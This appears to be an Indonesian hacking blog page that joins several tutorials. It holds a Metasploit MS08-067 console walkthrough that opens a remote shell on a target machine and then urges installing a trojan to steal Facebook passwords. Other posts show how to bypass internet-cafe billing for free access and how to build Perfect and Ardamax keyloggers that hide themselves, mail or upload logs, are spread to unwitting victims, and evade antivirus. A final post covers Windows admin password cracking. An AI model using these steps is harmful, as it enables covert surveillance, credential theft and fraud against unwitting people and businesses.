msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
-------- cut -----------

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payloads => windows/shell_bind_tcp

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :
msf exploit(ms08_067_netapi) > show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager
----------- dipotong sampai disini ---------------

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.28 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 192.168.1.28 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting

sekarang jalankan exploit :
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
Jreeeengg jeeenggg..... selamat nah...anda sudah menguasai satu komputer....nahhhhhhh sekarang terserah anda....kan masih ada 3 alat lagi yang blom kita gunakan..
nah untuk itu..anda harus mencari sendiri cara untuk menginstal trojan di komputernya dan mendapatkan sesuatu yang anda inginkan.....(seperti password FB ao dll) cape meka mengetik bela..
kan sa sudah kasihkan sampai penguasaan komputer....sekarang terserah anda.. ^_^ mat belajar yahh.....

Login Masuk Tanpa Ketahuan Billing Warnet

Mungkin sudah banyak teman-teman diluar sana yang sudah pernah memposting hal ini sebelumnya (saya mohon maaf ya) bukannya mau double posting tapi siapa tau aja berguna bagi teman-teman yang baru mau mencoba-coba. sekali lagi ini bukannya saya mengajar jahat tapi hanya sekedar pembelajaran bagi kita semua terutama bagi para pemilik warnet.
Nah mari kita mulai,
seperti kita ketahui sebagian besar warnet itu memakai sistem billing warnet (yah.. kalian lebih taulah nama-nama program begitu..), pada intinya program billing warnet itu akan selalu muncul pada saat anda akan loading masuk ke sistem operasi.. sebenarnya peran sistem billing ini hanyalah seperti TIRAI saja yang menghalangi user's untuk masuk dengan harus login dulu (dan tentunya membayar nnt kalau sudah logout). disini fungsi CTRL + ALT + DEL tidak berfungsi lagi karena pastinya telah diblok oleh Program Billing atau oleh admin warnet. trus bagaimana dong caranya masuk tanpa harus login?. nah... yang akan saya bagikan disini adalah "bagaimana cara menembus TIRAI tersebut supaya kita bisa masuk dengan bebas ke sistem operasi (dan berselancar didunia maya tentunya hehehe...) tanpa melalui TIRAI itu tadi. ini dia caranya

1. Masuk (login) kedalam sistem operasi (ya harus login dulu supaya kita bisa ngacak isinya
kan.. bayar dikit gak apa-apa hehehehehehe...)
2. Download program Zhider 2.0.0 Disini
3. Install program tersebut seperti proses penginstallan biasa
4. setelah itu keluar (logout) dari program billing dan masuk kembali
5. Pada tampilan jendela login program billing, kamu jalankan program Zhider dengan mengetik
CTRL + ALT + Z
6. Jreeeeennnggggg... dan TIRAI pun terbuka dan kamu bisa berinternet ria sesuka hati..

Gimana, gampang kan? nah untuk tambahan ini saya kasih lagi kombinasi-kombinasi keyword yang bisa dijalankan diprogram Zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan kotak dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

keylogger kirim data ke email

keylogger kirim data ke email

Artikel ini tidak bermaksud untuk memberitahukan kepada kalian bagaimana cara melakukan tindakan hacking atau menganjurkan kalian untuk melakukan tindakan hacking, hanya untuk berbagi pengalaman dan sharing.
Pertama yang harus kalian lakukan adalah mendapatkan software yang bernama keylogger merupakan tool yang merekam semua aktifitas pada keyboard target komputer.
Download softwarenya disini : http://www.ziddu.com/download/3170646/Perfect.Keylogger.v1.6.5.0.zip.html
Kedua adalah melakukan setup pada software tersebut untuk mendapatkan log file yang akan dikirim kepada email yang tersetup pada pilih option pada software ini.
Keterangan Langkah² Menjalankan Keylogger :
1. Email penerima log attachment -> Ini di isi dengan email anda / email penerima hasil dari logging, misal: emailsaya@gmail.com
2. SMTP Server -> Ini diisi dengan SMTP Server yang anda punya, misal: smtp.serversaya.net.id / smtp.indo.net.id
3. Username SMPT server -> Ini diisi dengan username SMTP yang anda dapat dari username SMTP Server, misal: smtpsaya@serversaya.net.id / smtpsaya@indo.net.id
4. Password SMPT server -> Password SMTP, di isi dengan password SMTP Anda :)
Ketiga lakukan remote installation dengan mengcompile file .exe bisa software apa saja.
Untuk melakukan compile remote installation sangat mudah kita dipandu dengan menu Wizard seperti pada gambar diatas.
Terakhir adalah menyebarkan file .exe tersebut kepada komputer target terserah untuk menyebarkannya lakukan dengan cara kalian bagamana agar target mau melakukan install software yang sudah kalian compile. Ini cara hack yang bener benar terbukti.
Sekali terinstal maka semua aktifitas komputer target akan terekam dan tidak terdeteksi oleh Anti virus. Software ini tidak gue complie jadi masih fresh.
Artikel Posted By Yohan – Approved By BinusHacker Team
Artikel Ini  Diupdate Oleh BinusHacker Team – Tambahan Cara Instlall Ardamax Keylogger Buat Kalian (^_^)

1. Setelah menginstal program, ketika menjalankan untuk pertama kalinya akan diminta untuk memasukkan nama dan nomor serial key yang udah include didalam folder ketika di download. Silakan dilihat didalamnya.


2. Setelah mengaktifkannya, langsung dibuka aja. Ketika Anda akan membukanya, Anda akan melihat icon ditambahkan ke dalam sistem tray. Langsung klik ajah.

3511692621 cbd1d6bed1 Tutorial On Ardamax 3.0 Keyloggers
3. Sekarang mari kita klik kanan pada ikon & lalu klik “Remote Installation”.

4. Klik Next. Pada option “Additional components” pilih “Log viewer”.
5. Next lanjut kepada “Invisibility” options. Centangin ajah semuanyabiar mantep Invisibilitynya.
6. Next option “Security”, gak perlu sih, langsung NEXT lagi ajah.
7. Next option “Web Update”, Jangan dicentangin semuanya / terserah sih maunya gimana, yg penting baca dulu perintah & maksudnya, kemudian klik NEXT.
8. Kemudian akan muncul “Options” page.  Pilih seperti contoh dibawah ini.
9. Cara dibawah ini harus dipastikan berjalan, klo gak jalan keyloggernya gak akan berhasil. Wajib diperhatikan!!
Pilihlah sesuai dengan keinginan anda. Diharapkan anda menyeting dengan benar :)
10. Isilah username & password FTP Account yang anda miliki. Seperti penjelasan sebelumnya di tahap awal cara setting FTP.
11. Klik test, untuk melakukan test koneksi, apabila berhasil. Maka dipastikan keylogger anda berjalan dengan baik.
12. Next ke “control” page, aturnya sesuai keinginan dah. Klo gak tau ya lewatin ajah.
13. Next ke “Screen shot”, Klik Next ajah klo sudah tau artinya itu mah.
14. Silakan pilih file untuk generate keylogger file.
15. Selesai!
16. Silakan gunakan dengan baik :)
Catatan: Deactivate sementara anti virus anda, kadang ini terdeteksi sebagai admx virus / keylogger. Enjoy & Eat It!
keylogger pengirim email lainnya download:

Cara Bobol Password Admin Windows 7,Windows Xp,dan Windows Vista

lupa passwordSetelah saya mengamati kata kunci yang membawa visitor masuk blog ini, Lupa Password Windows. Saya tahu mereka pastilah kecewa karena saya belum pernah membahasnya secara khusus. Yang pernah saya bahas baru sebatas reset password BIOS dan Recovery Pasword Windows menggunakan flasdisk. Masalah utamanya adalah bagaimana jika tidak ada recovery password dan Anda sama sekali lupa passwordnya dan Anda tidak bisa masuk desktop?
Jangan stress dulu ya, pastilah ada jalan keluarnya dan lumayan mudah diterapkan. Tetapi sebelumnya, logika Anda harus tepat mengenai struktur user dalam versi Window XP, Windows Vista, Windows 7. Perhatikan gambar dibawah ini yang saya ambil dari windows Vista.
account
Pada gambar diatas terlihat bahwa pada Windows (yang sedang dioperasikan) terdapat tiga user yaitu CUMK, Q-BONK dan YUMI semua diproteksi dengan password.
  1. CUMK Administrator merupakan user acount bawaan windows dengan hak akses tertinggi bagi semua level user windows.
  2. Q-BONK merupakan user ciptaan tetapi memiliki hak setara administrator CUMK. Pihak yang berhak membuat user setingkat ini adalah Administrator CUMK.
  3. YUMI adalah user dengan level pengguna yang sangat rendah, hanya bisa sebagai pengguna komputer dan tidak berhak menginstall dan mengubah bagian vital dari sistem operasi. Pihak yang bisa membuat user setingkat ini adalah CUMK dan Q-BONK.
User dengan level Administrator CUMK memiliki hak untuk melakukan akses dan perubahan terhadap sistem Windows seperti mengakses msconfig, regedit, dan sebagainya. User Administrator Q-BONK juga memiliki hak akses yang sama. Sedangkan user YUMI, hanya bisa melakukan pengoperasian Windows tanpa memiliki hak akses yang besar terhadap konfigurasi sistemnya.
Berkaitan dengan lupas password windows, inilah kemungkinannya;
  1. Jika saya lupa password account YUMI maka saya bisa mengatasinya dengan login sebagai CMUK atau Q-BONK lalu membuang password user YUMI dari Control Panel.
  2. Jika saya lupa password administrator CUMK maka saya bisa mengatasinya dengan login sebagai Q-BONK lalu membuang password administrator CMUK dari Control Panel. Demikian juga sebaliknya.
  3. Kalau saya lupa pasword administrator CMUK dan Q-BONK? Inilah malapetakanya karena saya tidak bisa masuk desktop, dan itulah yang akan kita bahas pada artikel ini
Singkatnya masalah kita kali ini adalah; lupa password administrator Windows, tidak punya disk reset password, tidak bisa masuk desktop. Ada beberapa cara untuk mengatasi masalah ini misalnya;
  1. Bisa mengunakan windows XP recovery console secara manual utk membuka folder C:WindowsSystem32Config. Hapuslah file SAM di dlmnya. Langkah ini akan menghapus semua user account di dlm PC, termasuk administrator account, sehingga ketika kamu login lagi admin password akan kosong. CATATAN : Bagi Anda yang termasuk pemula reparasi komputer saya tidak menganjurkan cara ini karena ada resiko-resiko lain yang bisa muncul jika salah menghapus file.
  2. Cara kedua yang saya anjurkan adalah menggunakan software Ophcrack. Mengenai penggunaan software ini telah saya bahas pada artikel ini;  Mengatasi Lupa Password Windows Dengan Ophcrack
W.E.D.W. Powered by Blogger.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Online Project management